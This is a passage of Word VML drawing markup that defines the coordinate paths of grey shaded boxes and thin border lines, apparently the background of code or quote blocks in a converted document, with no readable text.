3,3191,10117,3191,10090,3191,10061,3191,10031,3191,9999,3191,9966,3191,9931,3191,9895,3191,9858,3191,9819,3191,9778,3191,9735,3191,9691,3191,9646,3191,9598,3191,9549,3191,9498,3191,9445,3191,9391,3191,9334,3191,9275,3191,9215,3191,9153,3191,9088,3191,9022,3191,8953,3191,8883,3191,8810,3191,8735,3191,8658,3191,8578,3191,8497,3191,8413,3191,8326,3191,8238,3191,8146,3191,8053,3191,7957,3191,7859,3191,7758,3191,7654,3191,7548,3191,7439,3191,7328,3191,7214,3191,7097,3191,6977,3191,6855,3191,6730,3191,6602,3191,6471,3191,6337,3191,6201,3191,6061,3191,5918,3191,5773,3191,5624,3191,5472,3191,5317,3191,5159,3191,4997,3191,4833,3191,4665,3191,4494,3191,4319,3191,4141,3191,3960,3191,3776,3191,3587,3191,3396,3191,3201,3191,3002,3191,2800,3191,2594,3191,2385,3191,2172,3191,1955,3191,1734,3191,1510,3191,1510,3191,1510,3191,1510,3191,1510,3191,1510,3191,1510,3191,1510,3190,1510,3190,1510,3190,1510,3190,1510,3190,1510,3190,1510,3190,1510,3189,1510,3189,1510,3189,1510,3188,1510,3188,1510,3187,1510,3187,1510,3186,1510,3186,1510,3185,1510,3184,1510,3183,1510,3182,1510,3181,1510,3180,1510,3179,1510,3177,1510,3176,1510,3174,1510,3173,1510,3171,1510,3169,1510,3167,1510,3165,1510,3163,1510,3161,1510,3158,1510,3156,1510,3153,1510,3150,1510,3147,1510,3144,1510,3141,1510,3138,1510,3134,1510,3131,1510,3127,1510,3123,1510,3119,1510,3114,1510,3110,1510,3105,1510,3100,1510,3095,1510,3090,1510,3085,1510,3079,1510,3073,1510,3067,1510,3061,1510,3055,1510,3048,1510,3041,1510,3034,1510,3027,1510,3020,1510,3012,1510,3004,1510,2996,1510,2988,1510,2979,1510,2970,1510,2961,1510,2952,1510,2943,1510,2933,1510,2923,1510,2912,1510,2902,1510,2891,1510,2880,1510,2869,1510,2857,1510,2845,1510,2833,1510,2820,1510,2808,1510,2795,1510,2781,1510,2768,1510,2754,1510,2739,1510,2725,1510,2710,1510,2695,1510,2679,1510,2663,1510,2647,1510,2631,1510,2614,1510,2597,1510,2580,1510,2562,1510,2544,1510,2525,1510,2506,1510,2487,1510,2468,1510,2448,1510,2427,1510,2407,1510,2386,1510,2364,1510,2343,1510,2321,1510,2298,1510,2275e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:113.500pt;width:1.500pt;height:45.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2270" coordsize="30,910">
        <v:shape style="position:absolute;left:1490;top:2270;width:30;height:910" coordorigin="1490,2270" coordsize="30,910" path="m1517,2275l1517,2275,1517,2275,1517,2275,1517,2275,1517,2275,1517,2275,1517,2275,1517,2275,1517,2275,1517,2276,1517,2276,1517,2276,1517,2276,1517,2276,1517,2277,1517,2277,1517,2277,1517,2278,1517,2278,1517,2279,1517,2279,1517,2280,1517,2281,1517,2282,1517,2283,1517,2284,1517,2285,1517,2286,1517,2287,1517,2288,1517,2290,1517,2291,1517,2293,1517,2295,1517,2296,1517,2298,1517,2300,1517,2303,1517,2305,1517,2307,1517,2310,1517,2313,1517,2315,1517,2318,1517,2321,1517,2325,1517,2328,1517,2332,1517,2335,1517,2339,1517,2343,1517,2347,1517,2352,1517,2356,1517,2361,1517,2366,1517,2371,1517,2376,1517,2381,1517,2387,1517,2392,1517,2398,1517,2405,1517,2411,1517,2418,1517,2424,1517,2431,1517,2439,1517,2446,1517,2454,1517,2461,1517,2470,1517,2478,1517,2486,1517,2495,1517,2504,1517,2514,1517,2523,1517,2533,1517,2543,1517,2553,1517,2564,1517,2575,1517,2586,1517,2597,1517,2609,1517,2621,1517,2633,1517,2645,1517,2658,1517,2671,1517,2685,1517,2698,1517,2712,1517,2726,1517,2741,1517,2756,1517,2771,1517,2786,1517,2802,1517,2818,1517,2835,1517,2852,1517,2869,1517,2886,1517,2904,1517,2922,1517,2941,1517,2959,1517,2979,1517,2998,1517,3018,1517,3038,1517,3059,1517,3080,1517,3101,1517,3123,1517,3145,1517,3168,1517,3191e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:158.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,3170" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:3170;width:8990;height:650" coordorigin="1490,3170" coordsize="8990,650" path="m1510,3191l1510,3191,1510,3191,1510,3191,1510,3191,1510,3191,1510,3191,1511,3191,1512,3191,1512,3191,1514,3191,1515,3191,1517,3191,1519,3191,1521,3191,1524,3191,1528,3191,1532,3191,1536,3191,1541,3191,1546,3191,1552,3191,1559,3191,1566,3191,1575,3191,1583,3191,1593,3191,1603,3191,1615,3191,1627,3191,1640,3191,1654,3191,1668,3191,1684,3191,1701,3191,1719,3191,1738,3191,1758,3191,1780,3191,1802,3191,1826,3191,1851,3191,1877,3191,1904,3191,1933,3191,1963,3191,1995,3191,2028,3191,2063,3191,2099,3191,2136,3191,2175,3191,2216,3191,2259,3191,2303,3191,2348,3191,2396,3191,2445,3191,2496,3191,2549,3191,2604,3191,2660,3191,2719,3191,2779,3191,2841,3191,2906,3191,2972,3191,3041,3191,3112,3191,3184,3191,3259,3191,3336,3191,3416,3191,3498,3191,3582,3191,3668,3191,3757,3191,3848,3191,3941,3191,4037,3191,4136,3191,4236,3191,4340,3191,4446,3191,4555,3191,4666,3191,4780,3191,4897,3191,5017,3191,5139,3191,5264,3191,5392,3191,5523,3191,5657,3191,5793,3191,5933,3191,6076,3191,6222,3191,6370,3191,6522,3191,6677,3191,6835,3191,6997,3191,7161,3191,7329,3191,7500,3191,7675,3191,7853,3191,8034,3191,8219,3191,8407,3191,8598,3191,8793,3191,8992,3191,9194,3191,9400,3191,9609,3191,9823,3191,10039,3191,10260,3191,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191,10484,3192,10484,3192,10484,3192,10484,3192,10484,3193,10484,3193,10484,3194,10484,3194,10484,3195,10484,3195,10484,3196,10484,3196,10484,3197,10484,3198,10484,3199,10484,3200,10484,3201,10484,3202,10484,3203,10484,3204,10484,3205,10484,3207,10484,3208,10484,3210,10484,3211,10484,3213,10484,3215,10484,3216,10484,3218,10484,3220,10484,3222,10484,3225,10484,3227,10484,3229,10484,3232,10484,3235,10484,3237,10484,3240,10484,3243,10484,3246,10484,3250,10484,3253,10484,3256,10484,3260,10484,3264,10484,3267,10484,3271,10484,3276,10484,3280,10484,3284,10484,3289,10484,3293,10484,3298,10484,3303,10484,3308,10484,3313,10484,3319,10484,3324,10484,3330,10484,3336,10484,3342,10484,3348,10484,3355,10484,3361,10484,3368,10484,3375,10484,3382,10484,3389,10484,3397,10484,3404,10484,3412,10484,3420,10484,3429,10484,3437,10484,3446,10484,3454,10484,3463,10484,3472,10484,3482,10484,3491,10484,3501,10484,3511,10484,3522,10484,3532,10484,3543,10484,3554,10484,3565,10484,3576,10484,3588,10484,3599,10484,3611,10484,3624,10484,3636,10484,3649,10484,3662,10484,3675,10484,3688,10484,3702,10484,3716,10484,3730,10484,3745,10484,3759,10484,3774,10484,3790,10484,3805,10484,3821,10484,3821,10484,3821,10484,3821,10484,3821,10484,3821,10484,3821,10483,3821,10482,3821,10482,3821,10480,3821,10479,3821,10477,3821,10475,3821,10473,3821,10470,3821,10466,3821,10462,3821,10458,3821,10453,3821,10448,3821,10442,3821,10435,3821,10428,3821,10419,3821,10411,3821,10401,3821,10391,3821,10379,3821,10367,3821,10354,3821,10340,3821,10326,3821,10310,3821,10293,3821,10275,3821,10256,3821,10236,3821,10215,3821,10192,3821,10168,3821,10143,3821,10117,3821,10090,3821,10061,3821,10031,3821,9999,3821,9966,3821,9931,3821,9895,3821,9858,3821,9819,3821,9778,3821,9735,3821,9691,3821,9646,3821,9598,3821,9549,3821,9498,3821,9445,3821,9391,3821,9334,3821,9275,3821,9215,3821,9153,3821,9088,3821,9022,3821,8953,3821,8883,3821,8810,3821,8735,3821,8658,3821,8578,3821,8497,3821,8413,3821,8326,3821,8238,3821,8146,3821,8053,3821,7957,3821,7859,3821,7758,3821,7654,3821,7548,3821,7439,3821,7328,3821,7214,3821,7097,3821,6977,3821,6855,3821,6730,3821,6602,3821,6471,3821,6337,3821,6201,3821,6061,3821,5918,3821,5773,3821,5624,3821,5472,3821,5317,3821,5159,3821,4997,3821,4833,3821,4665,3821,4494,3821,4319,3821,4141,3821,3960,3821,3776,3821,3587,3821,3396,3821,3201,3821,3002,3821,2800,3821,2594,3821,2385,3821,2172,3821,1955,3821,1734,3821,1510,3821,1510,3821,1510,3821,1510,3821,1510,3821,1510,3821,1510,3821,1510,3821,1510,3821,1510,3821,1510,3821,1510,3821,1510,3820,1510,3820,1510,3820,1510,3820,1510,3820,1510,3819,1510,3819,1510,3819,1510,3818,1510,3818,1510,3817,1510,3817,1510,3816,1510,3816,1510,3815,1510,3814,1510,3814,1510,3813,1510,3812,1510,3811,1510,3810,1510,3809,1510,3807,1510,3806,1510,3805,1510,3803,1510,3802,1510,3800,1510,3799,1510,3797,1510,3795,1510,3793,1510,3791,1510,3789,1510,3787,1510,3785,1510,3782,1510,3780,1510,3777,1510,3774,1510,3771,1510,3768,1510,3765,1510,3762,1510,3759,1510,3755,1510,3752,1510,3748,1510,3744,1510,3740,1510,3736,1510,3732,1510,3727,1510,3723,1510,3718,1510,3713,1510,3708,1510,3703,1510,3698,1510,3693,1510,3687,1510,3681,1510,3675,1510,3669,1510,3663,1510,3657,1510,3650,1510,3643,1510,3637,1510,3629,1510,3622,1510,3615,1510,3607,1510,3599,1510,3591,1510,3583,1510,3575,1510,3566,1510,3557,1510,3548,1510,3539,1510,3530,1510,3520,1510,3510,1510,3500,1510,3490,1510,3480,1510,3469,1510,3458,1510,3447,1510,3436,1510,3424,1510,3412,1510,3400,1510,3388,1510,3375,1510,3363,1510,3350,1510,3337,1510,3323,1510,3309,1510,3295,1510,3281,1510,3267,1510,3252,1510,3237,1510,3222,1510,3206,1510,3191e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:158.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,3170" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:3170;width:30;height:650" coordorigin="1490,3170" coordsize="30,650" path="m1517,3191l1517,3191,1517,3191,1517,3191,1517,3191,1517,3191,1517,3191,1517,3191,1517,3191,1517,3191,1517,3191,1517,3191,1517,3191,1517,3191,1517,3191,1517,3192,1517,3192,1517,3192,1517,3192,1517,3193,1517,3193,1517,3194,1517,3194,1517,3195,1517,3195,1517,3196,1517,3196,1517,3197,1517,3198,1517,3199,1517,3200,1517,3201,1517,3202,1517,3203,1517,3204,1517,3205,1517,3207,1517,3208,1517,3210,1517,3211,1517,3213,1517,3215,1517,3216,1517,3218,1517,3220,1517,3222,1517,3225,1517,3227,1517,3229,1517,3232,1517,3235,1517,3237,1517,3240,1517,3243,1517,3246,1517,3250,1517,3253,1517,3256,1517,3260,1517,3264,1517,3267,1517,3271,1517,3276,1517,3280,1517,3284,1517,3289,1517,3293,1517,3298,1517,3303,1517,3308,1517,3313,1517,3319,1517,3324,1517,3330,1517,3336,1517,3342,1517,3348,1517,3355,1517,3361,1517,3368,1517,3375,1517,3382,1517,3389,1517,3397,1517,3404,1517,3412,1517,3420,1517,3429,1517,3437,1517,3446,1517,3454,1517,3463,1517,3472,1517,3482,1517,3491,1517,3501,1517,3511,1517,3522,1517,3532,1517,3543,1517,3554,1517,3565,1517,3576,1517,3588,1517,3599,1517,3611,1517,3624,1517,3636,1517,3649,1517,3662,1517,3675,1517,3688,1517,3702,1517,3716,1517,3730,1517,3745,1517,3759,1517,3774,1517,3790,1517,3805,1517,3821e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:190.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,3810" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:3810;width:8990;height:370" coordorigin="1490,3810" coordsize="8990,370" path="m1510,3821l1510,3821,1510,3821,1510,3821,1510,3821,1510,3821,1510,3821,1511,3821,1512,3821,1512,3821,1514,3821,1515,3821,1517,3821,1519,3821,1521,3821,1524,3821,1528,3821,1532,3821,1536,3821,1541,3821,1546,3821,1552,3821,1559,3821,1566,3821,1575,3821,1583,3821,1593,3821,1603,3821,1615,3821,1627,3821,1640,3821,1654,3821,1668,3821,1684,3821,1701,3821,1719,3821,1738,3821,1758,3821,1780,3821,1802,3821,1826,3821,1851,3821,1877,3821,1904,3821,1933,3821,1963,3821,1995,3821,2028,3821,2063,3821,2099,3821,2136,3821,2175,3821,2216,3821,2259,3821,2303,3821,2348,3821,2396,3821,2445,3821,2496,3821,2549,3821,2604,3821,2660,3821,2719,3821,2779,3821,2841,3821,2906,3821,2972,3821,3041,3821,3112,3821,3184,3821,3259,3821,3336,3821,3416,3821,3498,3821,3582,3821,3668,3821,3757,3821,3848,3821,3941,3821,4037,3821,4136,3821,4236,3821,4340,3821,4446,3821,4555,3821,4666,3821,4780,3821,4897,3821,5017,3821,5139,3821,5264,3821,5392,3821,5523,3821,5657,3821,5793,3821,5933,3821,6076,3821,6222,3821,6370,3821,6522,3821,6677,3821,6835,3821,6997,3821,7161,3821,7329,3821,7500,3821,7675,3821,7853,3821,8034,3821,8219,3821,8407,3821,8598,3821,8793,3821,8992,3821,9194,3821,9400,3821,9609,3821,9823,3821,10039,3821,10260,3821,10484,3821,10484,3821,10484,3821,10484,3821,10484,3821,10484,3821,10484,3821,10484,3821,10484,3821,10484,3821,10484,3821,10484,3821,10484,3821,10484,3821,10484,3821,10484,3822,10484,3822,10484,3822,10484,3822,10484,3822,10484,3822,10484,3823,10484,3823,10484,3823,10484,3824,10484,3824,10484,3824,10484,3825,10484,3825,10484,3826,10484,3826,10484,3827,10484,3828,10484,3828,10484,3829,10484,3830,10484,3830,10484,3831,10484,3832,10484,3833,10484,3834,10484,3835,10484,3836,10484,3837,10484,3839,10484,3840,10484,3841,10484,3843,10484,3844,10484,3846,10484,3847,10484,3849,10484,3850,10484,3852,10484,3854,10484,3856,10484,3858,10484,3860,10484,3862,10484,3864,10484,3867,10484,3869,10484,3871,10484,3874,10484,3877,10484,3879,10484,3882,10484,3885,10484,3888,10484,3891,10484,3894,10484,3897,10484,3901,10484,3904,10484,3908,10484,3911,10484,3915,10484,3919,10484,3923,10484,3927,10484,3931,10484,3935,10484,3939,10484,3944,10484,3948,10484,3953,10484,3958,10484,3963,10484,3968,10484,3973,10484,3978,10484,3983,10484,3989,10484,3994,10484,4000,10484,4006,10484,4012,10484,4018,10484,4024,10484,4030,10484,4037,10484,4044,10484,4050,10484,4057,10484,4064,10484,4071,10484,4079,10484,4086,10484,4094,10484,4101,10484,4109,10484,4117,10484,4125,10484,4134,10484,4142,10484,4151,10484,4160,10484,4168,10484,4178,10484,4187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6,1510,4196,1510,4196,1510,4195,1510,4195,1510,4195,1510,4195,1510,4195,1510,4194,1510,4194,1510,4194,1510,4193,1510,4193,1510,4193,1510,4192,1510,4192,1510,4191,1510,4191,1510,4190,1510,4189,1510,4189,1510,4188,1510,4187,1510,4187,1510,4186,1510,4185,1510,4184,1510,4183,1510,4182,1510,4181,1510,4180,1510,4178,1510,4177,1510,4176,1510,4174,1510,4173,1510,4171,1510,4170,1510,4168,1510,4167,1510,4165,1510,4163,1510,4161,1510,4159,1510,4157,1510,4155,1510,4153,1510,4150,1510,4148,1510,4146,1510,4143,1510,4140,1510,4138,1510,4135,1510,4132,1510,4129,1510,4126,1510,4123,1510,4120,1510,4116,1510,4113,1510,4110,1510,4106,1510,4102,1510,4098,1510,4094,1510,4090,1510,4086,1510,4082,1510,4078,1510,4073,1510,4069,1510,4064,1510,4059,1510,4055,1510,4050,1510,4044,1510,4039,1510,4034,1510,4028,1510,4023,1510,4017,1510,4011,1510,4005,1510,3999,1510,3993,1510,3987,1510,3980,1510,3973,1510,3967,1510,3960,1510,3953,1510,3946,1510,3938,1510,3931,1510,3923,1510,3916,1510,3908,1510,3900,1510,3892,1510,3883,1510,3875,1510,3866,1510,3858,1510,3849,1510,3840,1510,3830,1510,3821e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:190.500pt;width:1.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,3810" coordsize="30,390">
        <v:shape style="position:absolute;left:1490;top:3810;width:30;height:390" coordorigin="1490,3810" coordsize="30,390" path="m1517,3821l1517,3821,1517,3821,1517,3821,1517,3821,1517,3821,1517,3821,1517,3821,1517,3821,1517,3821,1517,3821,1517,3821,1517,3821,1517,3821,1517,3821,1517,3822,1517,3822,1517,3822,1517,3822,1517,3822,1517,3822,1517,3823,1517,3823,1517,3823,1517,3824,1517,3824,1517,3824,1517,3825,1517,3825,1517,3826,1517,3826,1517,3827,1517,3828,1517,3828,1517,3829,1517,3830,1517,3830,1517,3831,1517,3832,1517,3833,1517,3834,1517,3835,1517,3836,1517,3837,1517,3839,1517,3840,1517,3841,1517,3843,1517,3844,1517,3846,1517,3847,1517,3849,1517,3850,1517,3852,1517,3854,1517,3856,1517,3858,1517,3860,1517,3862,1517,3864,1517,3867,1517,3869,1517,3871,1517,3874,1517,3877,1517,3879,1517,3882,1517,3885,1517,3888,1517,3891,1517,3894,1517,3897,1517,3901,1517,3904,1517,3908,1517,3911,1517,3915,1517,3919,1517,3923,1517,3927,1517,3931,1517,3935,1517,3939,1517,3944,1517,3948,1517,3953,1517,3958,1517,3963,1517,3968,1517,3973,1517,3978,1517,3983,1517,3989,1517,3994,1517,4000,1517,4006,1517,4012,1517,4018,1517,4024,1517,4030,1517,4037,1517,4044,1517,4050,1517,4057,1517,4064,1517,4071,1517,4079,1517,4086,1517,4094,1517,4101,1517,4109,1517,4117,1517,4125,1517,4134,1517,4142,1517,4151,1517,4160,1517,4168,1517,4178,1517,4187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4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3,10484,5030,10484,5038,10484,5045,10484,5053,10484,5062,10484,5070,10484,5079,10484,5087,10484,5096,10484,5106,10484,5115,10484,5125,10484,5134,10484,5145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3,1517,5030,1517,5038,1517,5045,1517,5053,1517,5062,1517,5070,1517,5079,1517,5087,1517,5096,1517,5106,1517,5115,1517,5125,1517,5134,1517,5145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3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6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3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45.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,6090" coordsize="8990,910">
        <v:shape style="position:absolute;left:1490;top:6090;width:8990;height:910" coordorigin="1490,6090" coordsize="8990,91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3,10484,6103,10484,6103,10484,6103,10484,6104,10484,6104,10484,6104,10484,6105,10484,6105,10484,6106,10484,6106,10484,6107,10484,6108,10484,6109,10484,6110,10484,6111,10484,6112,10484,6113,10484,6114,10484,6115,10484,6117,10484,6118,10484,6120,10484,6122,10484,6123,10484,6125,10484,6127,10484,6130,10484,6132,10484,6134,10484,6137,10484,6140,10484,6142,10484,6145,10484,6148,10484,6152,10484,6155,10484,6158,10484,6162,10484,6166,10484,6170,10484,6174,10484,6178,10484,6183,10484,6188,10484,6192,10484,6197,10484,6203,10484,6208,10484,6214,10484,6219,10484,6225,10484,6232,10484,6238,10484,6244,10484,6251,10484,6258,10484,6265,10484,6273,10484,6281,10484,6288,10484,6297,10484,6305,10484,6313,10484,6322,10484,6331,10484,6341,10484,6350,10484,6360,10484,6370,10484,6380,10484,6391,10484,6402,10484,6413,10484,6424,10484,6436,10484,6448,10484,6460,10484,6472,10484,6485,10484,6498,10484,6511,10484,6525,10484,6539,10484,6553,10484,6568,10484,6583,10484,6598,10484,6613,10484,6629,10484,6645,10484,6662,10484,6679,10484,6696,10484,6713,10484,6731,10484,6749,10484,6768,10484,6786,10484,6806,10484,6825,10484,6845,10484,6865,10484,6886,10484,6907,10484,6928,10484,6950,10484,6972,10484,6995,10484,7018,10484,7018,10484,7018,10484,7018,10484,7018,10484,7018,10484,7018,10483,7018,10482,7018,10482,7018,10480,7018,10479,7018,10477,7018,10475,7018,10473,7018,10470,7018,10466,7018,10462,7018,10458,7018,10453,7018,10448,7018,10442,7018,10435,7018,10428,7018,10419,7018,10411,7018,10401,7018,10391,7018,10379,7018,10367,7018,10354,7018,10340,7018,10326,7018,10310,7018,10293,7018,10275,7018,10256,7018,10236,7018,10215,7018,10192,7018,10168,7018,10143,7018,10117,7018,10090,7018,10061,7018,10031,7018,9999,7018,9966,7018,9931,7018,9895,7018,9858,7018,9819,7018,9778,7018,9735,7018,9691,7018,9646,7018,9598,7018,9549,7018,9498,7018,9445,7018,9391,7018,9334,7018,9275,7018,9215,7018,9153,7018,9088,7018,9022,7018,8953,7018,8883,7018,8810,7018,8735,7018,8658,7018,8578,7018,8497,7018,8413,7018,8326,7018,8238,7018,8146,7018,8053,7018,7957,7018,7859,7018,7758,7018,7654,7018,7548,7018,7439,7018,7328,7018,7214,7018,7097,7018,6977,7018,6855,7018,6730,7018,6602,7018,6471,7018,6337,7018,6201,7018,6061,7018,5918,7018,5773,7018,5624,7018,5472,7018,5317,7018,5159,7018,4997,7018,4833,7018,4665,7018,4494,7018,4319,7018,4141,7018,3960,7018,3776,7018,3587,7018,3396,7018,3201,7018,3002,7018,2800,7018,2594,7018,2385,7018,2172,7018,1955,7018,1734,7018,1510,7018,1510,7018,1510,7018,1510,7018,1510,7018,1510,7018,1510,7017,1510,7017,1510,7017,1510,7017,1510,7017,1510,7017,1510,7017,1510,7017,1510,7016,1510,7016,1510,7016,1510,7015,1510,7015,1510,7014,1510,7014,1510,7013,1510,7013,1510,7012,1510,7011,1510,7010,1510,7009,1510,7008,1510,7007,1510,7006,1510,7004,1510,7003,1510,7001,1510,7000,1510,6998,1510,6996,1510,6994,1510,6992,1510,6990,1510,6988,1510,6985,1510,6983,1510,6980,1510,6977,1510,6974,1510,6971,1510,6968,1510,6965,1510,6961,1510,6957,1510,6954,1510,6950,1510,6945,1510,6941,1510,6937,1510,6932,1510,6927,1510,6922,1510,6917,1510,6912,1510,6906,1510,6900,1510,6894,1510,6888,1510,6882,1510,6875,1510,6868,1510,6861,1510,6854,1510,6847,1510,6839,1510,6831,1510,6823,1510,6815,1510,6806,1510,6797,1510,6788,1510,6779,1510,6770,1510,6760,1510,6750,1510,6739,1510,6729,1510,6718,1510,6707,1510,6696,1510,6684,1510,6672,1510,6660,1510,6647,1510,6635,1510,6622,1510,6608,1510,6595,1510,6581,1510,6566,1510,6552,1510,6537,1510,6522,1510,6506,1510,6490,1510,6474,1510,6458,1510,6441,1510,6424,1510,6406,1510,6389,1510,6371,1510,6352,1510,6333,1510,6314,1510,6294,1510,6275,1510,6254,1510,6234,1510,6213,1510,6191,1510,6170,1510,6147,1510,6125,1510,6102e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:304.500pt;width:1.500pt;height:46.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,6090" coordsize="30,930">
        <v:shape style="position:absolute;left:1490;top:6090;width:30;height:930" coordorigin="1490,6090" coordsize="30,930" path="m1517,6102l1517,6102,1517,6102,1517,6102,1517,6102,1517,6102,1517,6102,1517,6102,1517,6102,1517,6102,1517,6102,1517,6103,1517,6103,1517,6103,1517,6103,1517,6104,1517,6104,1517,6104,1517,6105,1517,6105,1517,6106,1517,6106,1517,6107,1517,6108,1517,6109,1517,6110,1517,6111,1517,6112,1517,6113,1517,6114,1517,6115,1517,6117,1517,6118,1517,6120,1517,6122,1517,6123,1517,6125,1517,6127,1517,6130,1517,6132,1517,6134,1517,6137,1517,6140,1517,6142,1517,6145,1517,6148,1517,6152,1517,6155,1517,6158,1517,6162,1517,6166,1517,6170,1517,6174,1517,6178,1517,6183,1517,6188,1517,6192,1517,6197,1517,6203,1517,6208,1517,6214,1517,6219,1517,6225,1517,6232,1517,6238,1517,6244,1517,6251,1517,6258,1517,6265,1517,6273,1517,6281,1517,6288,1517,6297,1517,6305,1517,6313,1517,6322,1517,6331,1517,6341,1517,6350,1517,6360,1517,6370,1517,6380,1517,6391,1517,6402,1517,6413,1517,6424,1517,6436,1517,6448,1517,6460,1517,6472,1517,6485,1517,6498,1517,6511,1517,6525,1517,6539,1517,6553,1517,6568,1517,6583,1517,6598,1517,6613,1517,6629,1517,6645,1517,6662,1517,6679,1517,6696,1517,6713,1517,6731,1517,6749,1517,6768,1517,6786,1517,6806,1517,6825,1517,6845,1517,6865,1517,6886,1517,6907,1517,6928,1517,6950,1517,6972,1517,6995,1517,7018e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:349.500pt;width:449.500pt;height:45.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,6990" coordsize="8990,910">
        <v:shape style="position:absolute;left:1490;top:6990;width:8990;height:910" coordorigin="1490,6990" coordsize="8990,910" path="m1510,7018l1510,7018,1510,7018,1510,7018,1510,7018,1510,7018,1510,7018,1511,7018,1512,7018,1512,7018,1514,7018,1515,7018,1517,7018,1519,7018,1521,7018,1524,7018,1528,7018,1532,7018,1536,7018,1541,7018,1546,7018,1552,7018,1559,7018,1566,7018,1575,7018,1583,7018,1593,7018,1603,7018,1615,7018,1627,7018,1640,7018,1654,7018,1668,7018,1684,7018,1701,7018,1719,7018,1738,7018,1758,7018,1780,7018,1802,7018,1826,7018,1851,7018,1877,7018,1904,7018,1933,7018,1963,7018,1995,7018,2028,7018,2063,7018,2099,7018,2136,7018,2175,7018,2216,7018,2259,7018,2303,7018,2348,7018,2396,7018,2445,7018,2496,7018,2549,7018,2604,7018,2660,7018,2719,7018,2779,7018,2841,7018,2906,7018,2972,7018,3041,7018,3112,7018,3184,7018,3259,7018,3336,7018,3416,7018,3498,7018,3582,7018,3668,7018,3757,7018,3848,7018,3941,7018,4037,7018,4136,7018,4236,7018,4340,7018,4446,7018,4555,7018,4666,7018,4780,7018,4897,7018,5017,7018,5139,7018,5264,7018,5392,7018,5523,7018,5657,7018,5793,7018,5933,7018,6076,7018,6222,7018,6370,7018,6522,7018,6677,7018,6835,7018,6997,7018,7161,7018,7329,7018,7500,7018,7675,7018,7853,7018,8034,7018,8219,7018,8407,7018,8598,7018,8793,7018,8992,7018,9194,7018,9400,7018,9609,7018,9823,7018,10039,7018,10260,7018,10484,7018,10484,7018,10484,7018,10484,7018,10484,7018,10484,7018,10484,7018,10484,7018,10484,7018,10484,7018,10484,7018,10484,7018,10484,7018,10484,7018,10484,7019,10484,7019,10484,7019,10484,7020,10484,7020,10484,7021,10484,7021,10484,7022,10484,7022,10484,7023,10484,7024,10484,7025,10484,7026,10484,7027,10484,7028,10484,7029,10484,7031,10484,7032,10484,7033,10484,7035,10484,7037,10484,7039,10484,7040,10484,7042,10484,7045,10484,7047,10484,7049,10484,7052,10484,7054,10484,7057,10484,7060,10484,7063,10484,7066,10484,7070,10484,7073,10484,7077,10484,7080,10484,7084,10484,7088,10484,7093,10484,7097,10484,7102,10484,7106,10484,7111,10484,7116,10484,7122,10484,7127,10484,7133,10484,7139,10484,7145,10484,7151,10484,7158,10484,7164,10484,7171,10484,7178,10484,7186,10484,7193,10484,7201,10484,7209,10484,7217,10484,7225,10484,7234,10484,7243,10484,7252,10484,7261,10484,7271,10484,7281,10484,7291,10484,7302,10484,7312,10484,7323,10484,7334,10484,7346,10484,7357,10484,7369,10484,7382,10484,7394,10484,7407,10484,7420,10484,7434,10484,7447,10484,7461,10484,7476,10484,7490,10484,7505,10484,7520,10484,7536,10484,7552,10484,7568,10484,7585,10484,7601,10484,7619,10484,7636,10484,7654,10484,7672,10484,7691,10484,7710,10484,7729,10484,7748,10484,7768,10484,7789,10484,7809,10484,7830,10484,7852,10484,7873,10484,7895,10484,7918,10484,7918,10484,7918,10484,7918,10484,7918,10484,7918,10484,7918,10483,7918,10482,7918,10482,7918,10480,7918,10479,7918,10477,7918,10475,7918,10473,7918,10470,7918,10466,7918,10462,7918,10458,7918,10453,7918,10448,7918,10442,7918,10435,7918,10428,7918,10419,7918,10411,7918,10401,7918,10391,7918,10379,7918,10367,7918,10354,7918,10340,7918,10326,7918,10310,7918,10293,7918,10275,7918,10256,7918,10236,7918,10215,7918,10192,7918,10168,7918,10143,7918,10117,7918,10090,7918,10061,7918,10031,7918,9999,7918,9966,7918,9931,7918,9895,7918,9858,7918,9819,7918,9778,7918,9735,7918,9691,7918,9646,7918,9598,7918,9549,7918,9498,7918,9445,7918,9391,7918,9334,7918,9275,7918,9215,7918,9153,7918,9088,7918,9022,7918,